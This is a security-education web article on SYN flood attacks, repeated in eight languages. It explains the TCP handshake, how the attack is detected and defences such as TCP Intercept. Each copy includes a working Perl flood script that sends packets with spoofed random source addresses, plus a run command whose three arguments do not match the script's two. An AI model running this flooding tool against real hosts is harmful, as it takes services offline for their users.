Москва
+7-929-527-81-33
Вологда
+7-921-234-45-78
Вопрос юристу онлайн Юридическая компания ЛЕГАС Вконтакте

SYN-флуд.

Обновлено 19.10.2025 08:01

 

SYN-флуд.

 

Атака состоит в отправке большого числа сегментов с флагом SYN. Это число больше, чем атакуемый узел может обработать одновременно.

Цель - привести узел в состояние, когда он не сможет принимать запросы на открытие новых соединений, а в худшем случае «зависнет».

Рассмотрим действия злоумышленника подробнее.

От имени несуществующего отправителя злоумышленник посылает TCP-сегмент с флагом SYN. Атакуемый узел, получив сегмент, отвечает сегментом с флагами SYN, ACK и переводит сессию в состояние SYN_RECEIVED. Создается очередь соединений, которые находятся в состоянии SYN_RECEIVED. Если поступает сегмент-подтверждение, то есть сегмент с флагом ACK и нужным acknowledgment number, то соединение переходит в состояние ESTABLISHED; если подтверждения не поступает, то соединение удаляется из очереди. Время нахождения соединения со статусом SYN_RECEIVED в очереди варьируется в зависимости от операционной системы и может доходить до нескольких минут. Когда очередь соединений уже заполнена, а система получает новый запрос на установление соединения, то этот запрос игнорируется.

Обнаружить атаку несложно - невозможность соединиться с данным портом, большое число соединений в состоянии SYN_RECEIVED.

Для защиты существуют специальные механизмы, например TCP Intercept. При использовании этого механизма маршрутизатор не передает SYN-сегмент, пришедший из внешней сети, в защищаемую сеть, а сначала пытается сам установить соединение от имени получателя SYN-сегмента. Если это удается, то маршрутизатор устанавливает соединение с получателем от имени внешнего отправителя и далее действует как посредник, но так, что «собеседники» о нем не догадываются.

Если скорость и количество поступающих на маршрутизатор SYN-сегментов увеличиваются, то он переходит в такой режим работы, при котором время ожидания ответа от отправителя SYN-сегмента резко уменьшается, и вновь прибывший SYN-сегмент «выталкивает» из очереди ранее полученный.

Сложнее обстоит дело с защитой, когда злоумышленник находится в вашей сети.

В этом случае советуют использовать программное обеспечение, которое позволяет установить максимальное число открываемых соединений и список разрешенных клиентов.

Для того чтобы проверить подверженность ваших систем данной атаке, можно воспользоваться следующим сценарием на языке Perl.

#!/usr/bin/perl

use Net::RawIP;

sub geraIP(){

$range = 255;

$iA = int(rand($range));

$iB = int(rand($range));

$iC = int(rand($range));

$iD = int(rand($range));

return $iA . "." . $iB . "." . $iC . "." . $iD;

}

sub attack(){

($dst,$port) = @ARGV;

$a = new Net::RawIP;

while(1) {

$src_port = rand(65534)+1;

$src = geraIP();

$a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn

=> 1}});

$a->send;

}

}

if($#ARGV == 1) {

attack();

} else {

print "Target Port\n";

}

Для запуска необходимо указать адреса источника, приемника и порт, для которых будет осуществляться атака.

root@kali: perl synflood.pl 192.168.1.193 192.168.1.1 80

Петухов Олег, юрист в области международного права и защиты персональных данных, специалист в области информационной безопасности, защиты информации и персональных данных.

Телеграм-канал: https://t.me/zashchitainformacii

Группа в Телеграм: https://t.me/zashchitainformacii1

Сайт: https://legascom.ru

Электронная почта: online@legascom.ru

#защитаинформации #информационнаябезопасность

 

SYN flood.

 

The attack consists of sending a large number of segments with the SYN flag. This number is more than the attacked node can process at the same time.

The goal is to bring the node to a state where it will not be able to accept requests to open new connections, and in the worst case, it will "hang".

Let's take a closer look at the attacker's actions.

On behalf of a non-existent sender, the attacker sends a TCP segment with the SYN flag. After receiving the segment, the attacked node responds with a segment with the SYN and ACK flags and switches the session to the SYN_RECEIVED state. A queue of connections is created that are in the SYN_RECEIVED state. If an acknowledgement segment is received, that is, a segment with the ACK flag and the required acknowledgement number, the connection switches to the ESTABLISHED state; if no confirmation is received, the connection is removed from the queue. The time it takes for a connection with the SYN_RECEIVED status to be queued varies depending on the operating system and can take up to several minutes. When the connection queue is already full, and the system receives a new connection request, this request is ignored.

It is not difficult to detect the attack - the inability to connect to this port, a large number of connections in the SYN_RECEIVED state.

There are special mechanisms for protection, such as TCP Intercept. When using this mechanism, the router does not transmit the SYN segment that came from the external network to the protected network, but first tries to establish a connection on behalf of the recipient of the SYN segment. If this is successful, the router establishes a connection with the recipient on behalf of the external sender and then acts as an intermediary, but in such a way that the "interlocutors" do not know about it.

If the speed and number of SYN segments arriving at the router increase, it switches to a mode of operation in which the waiting time for a response from the sender of the SYN segment decreases sharply, and the newly arrived SYN segment "pushes" the previously received one out of the queue.

The security situation is more complicated when an attacker is on your network.

In this case, it is recommended to use software that allows you to set the maximum number of open connections and a list of allowed clients.

In order to check the vulnerability of your systems to this attack, you can use the following Perl script.

#!/usr/bin/perl

use Net::RawIP;

sub geraIP(){

$range = 255;

$iA = int(rand($range));

$iB = int(rand($range));

$iC = int(rand($range));

$iD = int(rand($range));

return $iA . "." . $iB . "." . $iC . "." . $iD;

}

sub attack(){

($dst,$port) = @ARGV;

$a = new Net::RawIP;

while(1) {

$src_port = rand(65534)+1;

$src = geraIP();

$a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn

=> 1}});

$a->send;

}

}

if($#ARGV == 1) {

attack();

} else {

print "Target Port\n";

}

To launch, you must specify the source, receiver, and port addresses for which the attack will be carried out.

root@kali: perl synflood.pl 192.168.1.193 192.168.1.1 80

Oleg Petukhov, lawyer in the field of international law and personal data protection, information security specialist security, protection of information and personal data.

Telegram channel: https://t.me/protectioninformation

Telegram Group: https://t.me/informationprotection1

Website: https://legascom.ru

Email: online@legascom.ru

#informationprotection #informationsecurity

 

SYN-Flut.

 

Der Angriff besteht darin, eine große Anzahl von Segmenten mit dem SYN-Flag zu senden. Diese Zahl ist größer, als der angegriffene Knoten gleichzeitig verarbeiten kann.

Das Ziel besteht darin, den Knoten in einen Zustand zu versetzen, in dem er keine Anforderungen zum Öffnen neuer Verbindungen annehmen kann und im schlimmsten Fall «hängt».

Betrachten wir die Aktionen eines Angreifers genauer.

Ein Angreifer sendet im Namen eines nicht vorhandenen Absenders ein TCP-Segment mit dem SYN-Flag. Der angegriffene Knoten antwortet nach dem Empfang des Segments mit dem Segment mit den Flags SYN, ACK und versetzt die Sitzung in den Status SYN_RECEIVED. Es wird eine Warteschlange für Verbindungen erstellt, die sich im Status SYN_RECEIVED befinden. Wenn ein Bestätigungssegment eingeht, d. H. Ein Segment mit dem Flag ACK und der gewünschten acknowledgment-Nummer, wird die Verbindung in den Status ESTABLISHED versetzt; Wenn keine Bestätigung eingeht, wird die Verbindung aus der Warteschlange entfernt. Die Dauer der Verbindung mit dem Status SYN_RECEIVED in der Warteschlange variiert je nach Betriebssystem und kann einige Minuten dauern. Wenn die Verbindungswarteschlange bereits voll ist und das System eine neue Verbindungsanforderung erhält, wird diese Anforderung ignoriert.

Es ist einfach, einen Angriff zu erkennen - es ist nicht möglich, eine Verbindung zu diesem Port herzustellen, es gibt eine große Anzahl von Verbindungen im Status SYN_RECEIVED.

Es gibt spezielle Mechanismen zum Schutz, z. B. TCP Intercept. Bei Verwendung dieses Mechanismus überträgt der Router das vom externen Netzwerk stammende SYN-Segment nicht an das geschützte Netzwerk, sondern versucht zunächst, die Verbindung selbst im Namen des Empfängers des SYN-Segments herzustellen. Wenn dies gelingt, stellt der Router im Namen eines externen Absenders eine Verbindung zum Empfänger her und fungiert weiter als Vermittler, aber so, dass die «Gesprächspartner» ihn nicht erraten.

Wenn die Geschwindigkeit und die Anzahl der an den Router empfangenen SYN-Segmente zunimmt, wechselt sie in einen Betriebsmodus, in dem die Wartezeit für eine Antwort des Absenders des SYN-Segments drastisch abnimmt und das neu eingegangene SYN-Segment das zuvor empfangene «aus der Warteschlange» schiebt.

Schwieriger ist es mit dem Schutz, wenn sich ein Angreifer in Ihrem Netzwerk befindet.

In diesem Fall wird empfohlen, Software zu verwenden, mit der Sie die maximale Anzahl der zu öffnenden Verbindungen und eine Liste zugelassener Clients festlegen können.

Sie können das folgende Perl-Skript verwenden, um die Anfälligkeit Ihrer Systeme für diesen Angriff zu überprüfen.

#!/usr/bin/perl

use Net::RawIP;

sub geraIP(){

$range = 255;

$iA = int(rand($range));

$iB = int(rand($range));

$iC = int(rand($range));

$iD = int(rand($range));

return $iA . "." . $iB . "." . $iC . "." . $iD;

}

sub attack(){

($dst,$port) = @ARGV;

$a = new Net::RawIP;

while(1) {

$src_port = rand(65534)+1;

$src = geraIP();

$a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn

=> 1}});

$a->send;

}

}

if($#ARGV == 1) {

attack();

} else {

print "Target Port\n";

}

Zum Starten müssen Sie die Quell-, Ziel- und Portadressen angeben, für die der Angriff ausgeführt werden soll.

root@kali: perl synflood.pl 192.168.1.193 192.168.1.1 80

Oleg Petukhov, Rechtsanwalt im Bereich des Völkerrechts und des Schutzes personenbezogener Daten, Spezialist für Informationstechnik sicherheit, Schutz von Informationen und persönlichen Daten.

Telegramm-Kanal: https://t.me/datenschutzmit

Die Gruppe im Telegramm: https://t.me/datenschutzmit1

Website: https://legascom.ru

E-Mail: online@legascom.ru

#informationssicherheit #informationssicherheit

 

SYN-Flood.

 

L'attaque consiste à envoyer un grand nombre de segments avec le drapeau SYN. Ce nombre est supérieur à ce que le nœud attaqué peut traiter simultanément.

Le but est de mettre le nœud dans un état où il ne peut pas accepter les demandes d'ouverture de nouvelles connexions et, dans le pire des cas, il se bloque.

Considérons les actions de l'attaquant plus en détail.

Au nom d'un expéditeur inexistant, l'attaquant envoie un segment TCP avec l'indicateur SYN. Le nœud attaqué, après avoir reçu le segment, répond avec le segment avec les drapeaux SYN, ACK et met la session à l'état SYN_RECEIVED. Crée une file d'attente de connexions qui sont dans l'état SYN_RECEIVED. Si un segment de confirmation arrive, c'est-à-dire un segment avec l'indicateur ACK et le numéro acknowledgment souhaité, la connexion passe à l'état ESTABLISHED; si aucune confirmation n'arrive, la connexion est supprimée de la file d'attente. La durée de la connexion SYN_RECEIVED dans la file d'attente varie selon le système d'exploitation et peut aller jusqu'à quelques minutes. Lorsque la file d'attente de connexion est déjà pleine et que le système reçoit une nouvelle demande de connexion, cette demande est ignorée.

Détecter l'attaque est facile-l'impossibilité de se connecter à ce port, un grand nombre de connexions dans l'état SYN_RECEIVED.

Pour la protection, il existe des mécanismes spéciaux, tels que TCP Intercept. Avec ce mécanisme, le routeur ne transmet pas le segment SYN provenant du réseau externe au réseau sécurisé, mais tente d'établir lui-même une connexion pour le compte du destinataire du segment SYN. Si cela est possible, le routeur établit une connexion avec le destinataire au nom de l'expéditeur externe et agit en tant qu'intermédiaire, mais de sorte que les «interlocuteurs» ne le savent pas.

Si la vitesse et le nombre de segments SYN entrants sur le routeur augmentent, il passe en mode de fonctionnement dans lequel le temps d'attente de la réponse de l'expéditeur du segment SYN diminue considérablement et le segment SYN nouvellement arrivé «pousse» hors de la file d'attente précédemment reçu.

La protection est plus difficile lorsque l'attaquant est sur votre réseau.

Dans ce cas, il est conseillé d'utiliser un logiciel qui vous permet de définir le nombre maximal de connexions à ouvrir et la liste des clients autorisés.

Pour tester la vulnérabilité de vos systèmes à cette attaque, vous pouvez utiliser le script Perl suivant.

#!/usr/bin/perl

use Net::RawIP;

sub geraIP(){

$range = 255;

$iA = int(rand($range));

$iB = int(rand($range));

$iC = int(rand($range));

$iD = int(rand($range));

return $iA . "." . $iB . "." . $iC . "." . $iD;

}

sub attack(){

($dst,$port) = @ARGV;

$a = new Net::RawIP;

while(1) {

$src_port = rand(65534)+1;

$src = geraIP();

$a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn

=> 1}});

$a->send;

}

}

if($#ARGV == 1) {

attack();

} else {

print "Target Port\n";

}

Pour exécuter, vous devez spécifier les adresses de la source, du récepteur et du port pour lesquels l'attaque sera effectuée.

root@kali: perl synflood.pl 192.168.1.193 192.168.1.1 80

Petukhov Oleg, avocat en droit international et protection des données personnelles, spécialiste de l'information sécurité, protection de l'information et des données personnelles.

Telegram Channel: https://t.me/protecciondelainformacion

Groupe au Télégramme: https://t.me/securiteinformatique2

Site: https://legascom.ru

E-mail: online@legascom.ru

#sécuritéinformations #informationsécurité

 

SYN-Flood.

 

L'attaque consiste à envoyer un grand nombre de segments avec le drapeau SYN. Ce nombre est plus grand que ce que le nœud attaqué peut traiter simultanément.

Le but est de mettre le nœud dans un état où il ne peut pas accepter les demandes d'ouverture de nouvelles connexions et, dans le pire des cas, il se bloque.

Considérons les actions de l'attaquant plus en détail.

Au nom d'un expéditeur inexistant, l'attaquant envoie un segment TCP avec l'indicateur SYN. Le nœud attaqué, après avoir reçu le segment, répond avec le segment avec les drapeaux SYN, ACK et met la session à l'état SYN_RECEIVED. Crée une file d'attente de connexions qui sont dans l'état SYN_RECEIVED. Si un segment de confirmation arrive, c'est-à-dire un segment avec l'indicateur ACK et le numéro d'enregistrement souhaité, la connexion passe à l'état ESTABLISHED; si aucune confirmation n'arrive, la connexion est retirée de la file d'attente. La durée de connexion SYN_RECEIVED dans la file d'attente varie selon le système d'exploitation et peut aller jusqu'à quelques minutes. Lorsque la file d'attente de connexion est déjà pleine et que le système reçoit une nouvelle demande de connexion, cette demande est ignorée.

Détecter l'attaque est facile - l'impossibilité de se connecter à ce port, un grand nombre de connexions dans l'état SYN_RECEIVED.

Pour la protection, il existe des mécanismes spéciaux, comme TCP Intercept. Avec ce mécanisme, le routeur ne transmet pas le segment SYN du réseau externe au réseau sécurisé, mais tente d'établir lui-même une connexion pour le compte du destinataire du segment SYN. Si c'est possible, le routeur établit une connexion avec le destinataire au nom de l'expéditeur externe et agit comme intermédiaire, mais de sorte que les « interlocuteurs » ne le savent pas.

Si la vitesse et le nombre de segments SYN entrants sur le routeur augmentent, il passe en mode de fonctionnement dans lequel le temps d'attente de la réponse de l'expéditeur du segment SYN diminue considérablement et le segment SYN nouvellement arrivé « pousse » hors de la file d'attente précédemment reçu.

La protection est plus difficile lorsque l'attaquant est sur votre réseau.

Dans ce cas, il est conseillé d'utiliser un logiciel qui vous permet de définir le nombre maximal de connexions à ouvrir et la liste des clients autorisés.

Pour tester la vulnérabilité de vos systèmes à cette attaque, vous pouvez utiliser le script Perl suivant.

#!/usr/bin/perl

use Net::RawIP;

sub geraIP(){

$range = 255;

$iA = int(rand($range));

$iB = int(rand($range));

$iC = int(rand($range));

$iD = int(rand($range));

return $iA . "." . $iB . "." . $iC . "." . $iD;

}

sub attack(){

($dst,$port) = @ARGV;

$a = new Net::RawIP;

while(1) {

$src_port = rand(65534)+1;

$src = geraIP();

$a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn

=> 1}});

$a->send;

}

}

if($#ARGV == 1) {

attack();

} else {

print "Target Port\n";

}

Pour exécuter, vous devez spécifier les adresses de la source, du récepteur et du port pour lesquelles l'attaque sera effectuée.

root@kali: perl synflood.pl 192.168.1.193 192.168.1.1 80

Petukhov Oleg, avocat en droit international et protection des renseignements personnels, spécialiste de l'information sécurité, protection de l'information et des données personnelles.

Canal Telegram: https://t.me/protecciondelainformacion

Groupe au Télégramme: https://t.me/securiteinformatique2

Site: https://legascom.ru

Courriel: online@legascom.ru

#sécuritéinformations #informationsécurité

 

SYN-Flood.

 

El ataque consiste en enviar un gran número de segmentos con la bandera SYN. Este número es mayor que el nodo atacado puede procesar simultáneamente.

El objetivo es poner al nodo en un estado en el que no pueda aceptar solicitudes para abrir nuevas conexiones y, en el peor de los casos, se "congele".

Considere las acciones del atacante con más detalle.

En nombre de un remitente inexistente, el atacante envía un segmento TCP con el indicador SYN. El nodo atacado, después de recibir el segmento, responde con el segmento con los indicadores SYN, ACK y pone la sesión en el estado SYN_RECEIVED. Se crea una cola de conexiones que se encuentran en el estado SYN_RECEIVED. Si se recibe un segmento de confirmación, es decir, un segmento con el indicador ACK y el número de acknowledgment deseado, la conexión pasa al estado ESTABLISHED; si no se recibe confirmación, la conexión se elimina de la cola. El tiempo de espera de una conexión con el estado SYN_RECEIVED en la cola varía según el sistema operativo y puede durar varios minutos. Cuando la cola de conexión ya está llena y el sistema recibe una nueva solicitud de conexión, esta solicitud se ignora.

No es difícil detectar un ataque : no se puede conectar a este puerto, hay un gran número de conexiones en el estado SYN_RECEIVED.

Existen mecanismos especiales para la protección, como TCP Intercept. Con este mecanismo, el enrutador no transfiere el segmento SYN proveniente de la red externa a la red protegida, sino que primero intenta establecer la conexión en nombre del receptor del segmento SYN. Si esto tiene éxito, el enrutador establece una conexión con el receptor en nombre del remitente externo y luego actúa como intermediario, pero de modo que los "interlocutores" no lo adivinen.

Si la velocidad y el número de segmentos SYN que llegan al enrutador aumentan, entra en un modo de operación en el que el tiempo de espera de la respuesta del remitente del segmento SYN disminuye drásticamente, y el segmento SYN recién llegado "expulsa" de la cola al previamente recibido.

La protección es más difícil cuando el atacante está en su red.

En este caso, se recomienda utilizar un software que le permite establecer el número máximo de conexiones abiertas y una lista de clientes permitidos.

Para verificar la exposición de sus sistemas a este ataque, puede usar el siguiente script en Perl.

#!/usr/bin/perl

use Net::RawIP;

sub geraIP(){

$range = 255;

$iA = int(rand($range));

$iB = int(rand($range));

$iC = int(rand($range));

$iD = int(rand($range));

return $iA . "." . $iB . "." . $iC . "." . $iD;

}

sub attack(){

($dst,$port) = @ARGV;

$a = new Net::RawIP;

while(1) {

$src_port = rand(65534)+1;

$src = geraIP();

$a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn

=> 1}});

$a->send;

}

}

if($#ARGV == 1) {

attack();

} else {

print "Target Port\n";

}

Para iniciar, debe especificar la dirección de origen, el receptor y el puerto para el que se llevará a cabo el ataque.

root@kali: perl synflood.pl 192.168.1.193 192.168.1.1 80

Oleg Petukhov, abogado en el campo del derecho internacional y la protección de datos personales, especialista en información seguridad, protección de la información y datos personales.

Canal de Telegram: https://t.me/protecciondelainformacion1

Grupo de Telegramas: https://t.me/protecciondelainformacion2

Sitio web: https://legascom.ru

Correo electrónico: online@legascom.ru

#proteccióndelainformación #seguridaddelainformación

 

SYN-inundação.

 

O ataque consiste em enviar um grande número de segmentos com a bandeira SYN. Esse número é maior do que o nó atacado pode processar ao mesmo tempo.

O objetivo é colocar o nó em um estado em que ele não será capaz de aceitar solicitações para abrir novas conexões e, na pior das hipóteses, "congelar".

Vamos dar uma olhada mais de perto nas ações do atacante.

Em nome de um remetente inexistente, o invasor envia um segmento TCP com a bandeira SYN. O nó atacado, depois de receber um segmento, responde com um segmento com sinalizadores SYN, ACK e transfere a sessão para o estado SYN_RECEIVED. É criada uma fila de conexões que estão no estado SYN_RECEIVED. Se um segmento de confirmação for recebido, ou seja, um segmento com o flag ACK e o número de acknowledgment desejado, a conexão entrará no estado ESTABLISHED; se nenhuma confirmação for recebida, a conexão será removida da fila. O tempo que uma conexão SYN_RECEIVED permanece em uma fila varia de acordo com o sistema operacional e pode levar vários minutos. Quando a fila de conexões já está cheia e o sistema recebe uma nova solicitação de conexão, essa solicitação é ignorada.

É fácil detectar um ataque - a incapacidade de se conectar a essa porta, um grande número de conexões no estado SYN_RECEIVED.

Existem mecanismos de proteção especiais, como o TCP Intercept. Ao usar esse mecanismo, o roteador não transfere o segmento SYN que vem da rede externa para a rede protegida, mas primeiro tenta se conectar em nome do destinatário do segmento SYN. Se isso for bem-sucedido, o roteador estabelece uma conexão com o destinatário em nome do remetente externo e, em seguida, age como um intermediário, mas de modo que os "interlocutores" não o conheçam.

Se a velocidade e o número de segmentos SYN que chegam ao roteador aumentam, ele entra em um modo de operação em que o tempo de espera da resposta do remetente do segmento SYN diminui drasticamente, e o segmento SYN recém-chegado "empurra" da fila o segmento Syn recebido anteriormente.

A proteção é mais difícil quando um invasor está em sua rede.

Neste caso, recomenda-se o uso de software que permite definir o número máximo de conexões abertas e a lista de clientes permitidos.

Para verificar a suscetibilidade de seus sistemas a este ataque, você pode usar o seguinte script em linguagem Perl.

#!/usr/bin/perl

use Net::RawIP;

sub geraIP(){

$range = 255;

$iA = int(rand($range));

$iB = int(rand($range));

$iC = int(rand($range));

$iD = int(rand($range));

return $iA . "." . $iB . "." . $iC . "." . $iD;

}

sub attack(){

($dst,$port) = @ARGV;

$a = new Net::RawIP;

while(1) {

$src_port = rand(65534)+1;

$src = geraIP();

$a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn

=> 1}});

$a->send;

}

}

if($#ARGV == 1) {

attack();

} else {

print "Target Port\n";

}

Para executar, você precisa especificar os endereços de origem, destino e porta para os quais o ataque será executado.

root@kali: perl synflood.pl 192.168.1.193 192.168.1.1 80

Petukhov Oleg, advogado de Direito Internacional e proteção de dados pessoais, especialista em informação segurança, proteção de informações e dados pessoais.

Canal do Telegram: https://t.me/protecaodaInformacao

Grupo em Telegram: https://t.me/protecaodaInformacao1

Site: https://legascom.ru

Correio eletrónico: online@legascom.ru

#segurançadaInformação #Segurançadainformação

 

Syn flood.

 

O ataque consiste em enviar um grande número de segmentos com a bandeira SYN. Esse número é maior do que o nó atacado pode processar ao mesmo tempo.

O objetivo é levar o nó a um estado em que ele não poderá aceitar solicitações para abrir novas conexões e, na pior das hipóteses, ele "travará".

Vamos dar uma olhada mais de perto nas ações do atacante.

Em nome de um remetente inexistente, o invasor envia um segmento TCP com o sinalizador SYN. Depois de receber o segmento, o nó atacado responde com um segmento com os sinalizadores SYN e ACK e alterna a sessão para o estado SYN_RECEIVED. É criada uma fila de conexões que estão no estado SYN_RECEIVED. Se um segmento do reconhecimento é recebido, isto é, um segmento com a bandeira ACK e o número exigido do reconhecimento, a conexão comuta ao estado estabelecido; se nenhuma confirmação é recebida, a conexão está removida da fila. O tempo que leva para uma conexão com o status SYN_RECEIVED ser enfileirada varia dependendo do sistema operacional e pode levar até vários minutos. Quando a fila de conexão já está cheia e o sistema recebe uma nova solicitação de conexão, essa solicitação é ignorada.

Não é difícil detectar o ataque-a incapacidade de se conectar a esta porta, um grande número de conexões no estado SYN_RECEIVED.

Existem mecanismos especiais de proteção, como o TCP Intercept. Ao usar esse mecanismo, o roteador não transmite o segmento SYN que veio da rede externa para a rede protegida, mas primeiro tenta estabelecer uma conexão em nome do destinatário do segmento SYN. Se isso for bem-sucedido, o roteador estabelece uma conexão com o destinatário em nome do remetente externo e, em seguida, atua como intermediário, mas de tal forma que os "interlocutores" não sabem disso.

Se a velocidade e o número de segmentos SYN que chegam no roteador aumentam, comuta a um modo de operação em que o tempo de espera para uma resposta do remetente do segmento SYN diminui agudamente, e o segmento SYN recentemente chegado "empurra" recebido previamente um fora da fila.

A situação de segurança é mais complicada quando um invasor está em sua rede.

Nesse caso, é recomendável usar um software que permita definir o número máximo de conexões abertas e uma lista de clientes permitidos.

Para verificar a vulnerabilidade de seus sistemas a esse ataque, você pode usar o seguinte script Perl.

#!/usr/bin/perl

use Net::RawIP;

sub geraIP(){

$range = 255;

$iA = int(rand($range));

$iB = int(rand($range));

$iC = int(rand($range));

$iD = int(rand($range));

return $iA . "." . $iB . "." . $iC . "." . $iD;

}

sub attack(){

($dst,$port) = @ARGV;

$a = new Net::RawIP;

while(1) {

$src_port = rand(65534)+1;

$src = geraIP();

$a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn

=> 1}});

$a->send;

}

}

if($#ARGV == 1) {

attack();

} else {

print "Target Port\n";

}

Para iniciar, você deve especificar os endereços de origem, receptor e porta para os quais o ataque será realizado.

root@kali: perl synflood.pl 192.168.1.193 192.168.1.1 80

Petukhov Oleg, advogado de Direito Internacional e proteção de dados pessoais, especialista em informação segurança, proteção de informações e dados pessoais.

Canal do Telegram: https://t.me/protecaodaInformacao

Grupo em Telegram: https://t.me/protecaodaInformacao1

Site: https://legascom.ru

Correio eletrónico: online@legascom.ru

#segurançadaInformação #Segurançadainformação

 

SYN-flood.

 

L'attacco consiste nell'inviare un gran numero di segmenti con il flag SYN. Questo numero è maggiore di quello che il nodo attaccato può elaborare contemporaneamente.

L'obiettivo è portare il nodo in uno stato in cui non è in grado di accettare richieste per aprire nuove connessioni e nel peggiore dei casi «si blocca».

Considera le azioni dell'attaccante in modo più dettagliato.

Per conto di un mittente inesistente, un utente malintenzionato invia un segmento TCP con un flag SYN. Il nodo attaccato, dopo aver ricevuto il segmento, risponde con il segmento con i flag SYN, ACK e mette la sessione nello stato SYN_RECEIVED. Viene creata una coda di connessioni che si trovano nello stato SYN_RECEIVED. Se viene ricevuto un segmento di riconoscimento, ovvero un segmento con il flag ACK e il numero acknowledgment desiderato, la connessione passa allo stato ESTABLISHED; se non viene ricevuto alcun riconoscimento, la connessione viene rimossa dalla coda. Il tempo in cui una connessione SYN_RECEIVED è in coda varia a seconda del sistema operativo e può richiedere diversi minuti. Quando la coda di connessione è già piena e il sistema riceve una nuova richiesta di connessione, questa richiesta viene ignorata.

È facile rilevare un attacco : l'incapacità di connettersi a questa porta, un gran numero di connessioni nello stato SYN_RECEIVED.

Esistono meccanismi speciali per la protezione, ad esempio TCP Intercept. Con questo meccanismo, il router non trasmette il segmento SYN proveniente dalla rete esterna alla rete protetta, ma tenta innanzitutto di stabilire la connessione stessa per conto del destinatario del segmento SYN. Se ciò ha successo, il router stabilisce una connessione con il destinatario per conto del mittente esterno e funge ulteriormente da intermediario, ma in modo che gli «interlocutori» non lo indovinino.

Se la velocità e il numero di segmenti SYN in arrivo sul router aumentano, entra in una modalità operativa in cui il tempo di attesa per la risposta dal mittente del segmento SYN diminuisce drasticamente e il segmento SYN appena arrivato «espelle» dalla coda quello precedentemente ricevuto.

La cosa più difficile è la protezione quando un utente malintenzionato si trova sulla tua rete.

In questo caso, si consiglia di utilizzare un software che consente di stabilire il numero massimo di connessioni aperte e un elenco di client consentiti.

Per verificare l'esposizione dei sistemi a questo attacco, è possibile utilizzare il seguente script in linguaggio Perl.

#!/usr/bin/perl

use Net::RawIP;

sub geraIP(){

$range = 255;

$iA = int(rand($range));

$iB = int(rand($range));

$iC = int(rand($range));

$iD = int(rand($range));

return $iA . "." . $iB . "." . $iC . "." . $iD;

}

sub attack(){

($dst,$port) = @ARGV;

$a = new Net::RawIP;

while(1) {

$src_port = rand(65534)+1;

$src = geraIP();

$a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn

=> 1}});

$a->send;

}

}

if($#ARGV == 1) {

attack();

} else {

print "Target Port\n";

}

Per eseguire, è necessario specificare gli indirizzi di origine, ricevitore e porta per i quali verrà effettuato l'attacco.

root@kali: perl synflood.pl 192.168.1.193 192.168.1.1 80

Oleg Petukhov, avvocato nel campo del diritto internazionale e della protezione dei dati personali, specialista nel campo dell'informazione sicurezza, protezione delle informazioni e dei dati personali.

Canale Telegram: https://t.me/protezionedelleinformazioni

Gruppo in telegramma: https://t.me/protezionedelleinformazioni1

Sito: https://legascom.ru

E-mail: online@legascom.ru

#protezionedelleInformazioni #sicurezzadelleinformazioni